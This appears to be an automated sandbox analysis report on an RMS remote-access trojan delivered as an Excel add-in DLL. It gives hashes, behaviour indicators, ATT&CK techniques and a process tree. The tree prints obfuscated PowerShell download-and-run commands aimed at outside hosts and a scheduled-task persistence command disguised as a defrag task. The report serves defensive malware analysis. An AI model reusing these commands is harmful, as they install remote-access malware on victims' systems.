rms | 45d4a263dd703688cb52e0c1e62bf25b40e45cbaa83fbc3f85d35e8217691dba

Analysis

max time kernel
148s
max time network
149s
platform
windows10_x64
resource
win10-en
submitted
20-09-2021 08:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TRNX_DTD_20_09_2021.xll.dll
Size

16KB
MD5

7d20f760b34575272b3ad4ae3dd12741
SHA1

fd2e65157856cc2886bd82376e7f86c3a6c557e7
SHA256

30e8f7a9972ed5bd973086dc59bc8232508889dc9c51bd1274831e5fd2bbd35f
SHA512

0abd5e877aeb51034f854fabe9ca13f306896cd7cdfccaa69fbe288faf7d76ce9195fb6e968e36213b97ac2eeefa10a9d0dae91d7ca8bc5445812a9303d64176

Score

10^/10

rms rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1448 created 2012	1448	svchost.exe	86

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	1892	rundll32.exe
9	2092	powershell.exe
11	3744	powershell.exe
12	1932	powershell.exe
13	3744	powershell.exe
14	1932	powershell.exe
16	3744	powershell.exe
17	1932	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
1052	services32.exe
2012	lightsv.exe
3052	lightsv.exe
2860	lightsv.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	lightsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	lightsv.exe

Loads dropped DLL 11 IoCs

pid	Process
1052	services32.exe
1052	services32.exe
1052	services32.exe
1052	services32.exe
2012	lightsv.exe
2012	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
1052	services32.exe
2860	lightsv.exe
2860	lightsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2540	3432	WerFault.exe	70

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lightsv.exe
Key opened	\REGISTRY\MACHINE\hardware\description\system\centralProcessor\16	lightsv.exe
Key opened	\REGISTRY\MACHINE\hardware\description\system\centralProcessor\1	lightsv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	lightsv.exe
Key opened	\REGISTRY\MACHINE\hardware\description\system\centralProcessor\2	lightsv.exe
Key opened	\REGISTRY\MACHINE\hardware\description\system\centralProcessor\0	lightsv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
888	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	lightsv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	lightsv.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
2540	WerFault.exe
3168	powershell.exe
3168	powershell.exe
3168	powershell.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
3016	powershell.exe
1184	powershell.exe
3016	powershell.exe
1184	powershell.exe
3016	powershell.exe
1184	powershell.exe
3744	powershell.exe
3744	powershell.exe
1932	powershell.exe
1932	powershell.exe
3744	powershell.exe
1932	powershell.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeRestorePrivilege	2540	WerFault.exe
Token: SeBackupPrivilege	2540	WerFault.exe
Token: SeDebugPrivilege	2540	WerFault.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2012	lightsv.exe
Token: SeDebugPrivilege	2012	lightsv.exe
Token: SeTcbPrivilege	1448	svchost.exe
Token: SeTcbPrivilege	1448	svchost.exe
Token: SeTakeOwnershipPrivilege	3052	lightsv.exe
Token: SeTcbPrivilege	3052	lightsv.exe
Token: SeTcbPrivilege	3052	lightsv.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
2012	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
3052	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe
2860	lightsv.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 4044 wrote to memory of 1892	4044	rundll32.exe	69
PID 4044 wrote to memory of 1892	4044	rundll32.exe	69
PID 4044 wrote to memory of 1892	4044	rundll32.exe	69
PID 1892 wrote to memory of 3432	1892	rundll32.exe	70
PID 1892 wrote to memory of 3432	1892	rundll32.exe	70
PID 1892 wrote to memory of 3432	1892	rundll32.exe	70
PID 3432 wrote to memory of 3168	3432	mshta.exe	73
PID 3432 wrote to memory of 3168	3432	mshta.exe	73
PID 3432 wrote to memory of 3168	3432	mshta.exe	73
PID 3432 wrote to memory of 3016	3432	mshta.exe	74
PID 3432 wrote to memory of 3016	3432	mshta.exe	74
PID 3432 wrote to memory of 3016	3432	mshta.exe	74
PID 3168 wrote to memory of 2092	3168	powershell.exe	76
PID 3168 wrote to memory of 2092	3168	powershell.exe	76
PID 3168 wrote to memory of 2092	3168	powershell.exe	76
PID 3432 wrote to memory of 1184	3432	mshta.exe	78
PID 3432 wrote to memory of 1184	3432	mshta.exe	78
PID 3432 wrote to memory of 1184	3432	mshta.exe	78
PID 3016 wrote to memory of 3744	3016	powershell.exe	80
PID 3016 wrote to memory of 3744	3016	powershell.exe	80
PID 3016 wrote to memory of 3744	3016	powershell.exe	80
PID 1184 wrote to memory of 1932	1184	powershell.exe	81
PID 1184 wrote to memory of 1932	1184	powershell.exe	81
PID 1184 wrote to memory of 1932	1184	powershell.exe	81
PID 3168 wrote to memory of 1052	3168	powershell.exe	85
PID 3168 wrote to memory of 1052	3168	powershell.exe	85
PID 3168 wrote to memory of 1052	3168	powershell.exe	85
PID 1052 wrote to memory of 2012	1052	services32.exe	86
PID 1052 wrote to memory of 2012	1052	services32.exe	86
PID 1052 wrote to memory of 2012	1052	services32.exe	86
PID 1448 wrote to memory of 3052	1448	svchost.exe	88
PID 1448 wrote to memory of 3052	1448	svchost.exe	88
PID 1448 wrote to memory of 3052	1448	svchost.exe	88
PID 1052 wrote to memory of 2516	1052	services32.exe	89
PID 1052 wrote to memory of 2516	1052	services32.exe	89
PID 2516 wrote to memory of 888	2516	cmd.exe	91
PID 2516 wrote to memory of 888	2516	cmd.exe	91
PID 2516 wrote to memory of 2652	2516	cmd.exe	92
PID 2516 wrote to memory of 2652	2516	cmd.exe	92
PID 2516 wrote to memory of 3780	2516	cmd.exe	93
PID 2516 wrote to memory of 3780	2516	cmd.exe	93

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\TRNX_DTD_20_09_2021.xll.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:4044
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\TRNX_DTD_20_09_2021.xll.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\74992835286.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 1360
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2540
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://contentserver116.ru/bin/8736487436.dat ' -OuTfIle 'services32.exe' ; StARt 'services32.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpASs -NOp -w 1 WGeT "http://contentserver116.ru/bin/8736487436.dat " -OuTfIle services32.exe
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
    - - C:\Users\Admin\AppData\Local\Temp\services32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\services32.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1052
      - C:\Users\Public\Lightshot Screenshots\lightsv.exe
        
        "C:\Users\Public\Lightshot Screenshots\lightsv.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2012
        
        C:\Users\Public\Lightshot Screenshots\lightsv.exe
        
        "C:\Users\Public\Lightshot Screenshots\lightsv.exe" -run_agent -second
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3052
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c SchTasks /create /f /XML %temp%\Log436.xml /TN \microsoft\windows\defrag\scheduleddefrag && schtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE && schtasks /run /TN \microsoft\windows\defrag\scheduleddefrag
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2516
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /create /f /XML C:\Users\Admin\AppData\Local\Temp\Log436.xml /TN \microsoft\windows\defrag\scheduleddefrag
        7⤵
        Creates scheduled task(s)
        
        PID:888
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE
        7⤵
        
        PID:2652
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /run /TN \microsoft\windows\defrag\scheduleddefrag
        7⤵
        
        PID:3780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://server037.com/data/938438462.dat ' -OuTfIle 'C:\Users\Public\Music\spooler.exe' ; StARt 'C:\Users\Public\Music\spooler.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpASs -NOp -w 1 WGeT "http://server037.com/data/938438462.dat " -OuTfIle C:\Users\Public\Music\spooler.exe
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://server037.com/data/99283654.dat ' -OuTfIle 'C:\Users\Public\Music\realtek32.exe' ; StARt 'C:\Users\Public\Music\realtek32.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1184
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpASs -NOp -w 1 WGeT "http://server037.com/data/99283654.dat " -OuTfIle C:\Users\Public\Music\realtek32.exe
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1368

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448

C:\Users\Public\Lightshot Screenshots\lightsv.exe
"C:\Users\Public\Lightshot Screenshots\lightsv.exe" -run_agent -second
1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1184-163-0x00000000067E2000-0x00000000067E3000-memory.dmp

Filesize
4KB

Download
memory/1184-340-0x00000000067E3000-0x00000000067E4000-memory.dmp

Filesize
4KB

Download
memory/1184-162-0x00000000067E0000-0x00000000067E1000-memory.dmp

Filesize
4KB

Download
memory/1932-224-0x0000000004983000-0x0000000004984000-memory.dmp

Filesize
4KB

Download
memory/1932-209-0x0000000004982000-0x0000000004983000-memory.dmp

Filesize
4KB

Download
memory/1932-208-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/2012-614-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download
memory/2012-605-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

Filesize
4KB

Download
memory/2012-615-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/2092-177-0x0000000009470000-0x0000000009471000-memory.dmp

Filesize
4KB

Download
memory/2092-142-0x0000000004290000-0x0000000004291000-memory.dmp

Filesize
4KB

Download
memory/2092-143-0x0000000004292000-0x0000000004293000-memory.dmp

Filesize
4KB

Download
memory/2092-187-0x0000000004293000-0x0000000004294000-memory.dmp

Filesize
4KB

Download
memory/2092-178-0x0000000008AC0000-0x0000000008AC1000-memory.dmp

Filesize
4KB

Download
memory/2860-638-0x00000000036A0000-0x00000000036A1000-memory.dmp

Filesize
4KB

Download
memory/3016-160-0x00000000067F2000-0x00000000067F3000-memory.dmp

Filesize
4KB

Download
memory/3016-157-0x00000000067F0000-0x00000000067F1000-memory.dmp

Filesize
4KB

Download
memory/3016-339-0x00000000067F3000-0x00000000067F4000-memory.dmp

Filesize
4KB

Download
memory/3016-295-0x0000000008C10000-0x0000000008C11000-memory.dmp

Filesize
4KB

Download
memory/3052-616-0x00000000018C0000-0x00000000018C1000-memory.dmp

Filesize
4KB

Download
memory/3052-631-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/3052-639-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/3052-640-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/3052-637-0x0000000007D70000-0x0000000007D71000-memory.dmp

Filesize
4KB

Download
memory/3052-636-0x00000000065D0000-0x00000000065D1000-memory.dmp

Filesize
4KB

Download
memory/3052-635-0x0000000005EE0000-0x0000000005EE1000-memory.dmp

Filesize
4KB

Download
memory/3052-634-0x0000000005E90000-0x0000000005E91000-memory.dmp

Filesize
4KB

Download
memory/3052-633-0x0000000005E40000-0x0000000005E41000-memory.dmp

Filesize
4KB

Download
memory/3052-632-0x0000000005DF0000-0x0000000005DF1000-memory.dmp

Filesize
4KB

Download
memory/3052-617-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/3052-618-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/3052-619-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/3052-630-0x0000000005F30000-0x0000000005F31000-memory.dmp

Filesize
4KB

Download
memory/3168-126-0x0000000007CD0000-0x0000000007CD1000-memory.dmp

Filesize
4KB

Download
memory/3168-125-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/3168-123-0x00000000073E0000-0x00000000073E1000-memory.dmp

Filesize
4KB

Download
memory/3168-441-0x00000000049C3000-0x00000000049C4000-memory.dmp

Filesize
4KB

Download
memory/3168-131-0x0000000008580000-0x0000000008581000-memory.dmp

Filesize
4KB

Download
memory/3168-122-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/3168-440-0x000000007FC80000-0x000000007FC81000-memory.dmp

Filesize
4KB

Download
memory/3168-130-0x0000000007B40000-0x0000000007B41000-memory.dmp

Filesize
4KB

Download
memory/3168-124-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/3168-129-0x00000000049C2000-0x00000000049C3000-memory.dmp

Filesize
4KB

Download
memory/3168-128-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/3168-132-0x00000000083F0000-0x00000000083F1000-memory.dmp

Filesize
4KB

Download
memory/3168-127-0x0000000007D60000-0x0000000007D61000-memory.dmp

Filesize
4KB

Download
memory/3744-185-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/3744-186-0x0000000005092000-0x0000000005093000-memory.dmp

Filesize
4KB

Download
memory/3744-223-0x0000000005093000-0x0000000005094000-memory.dmp

Filesize
4KB

Download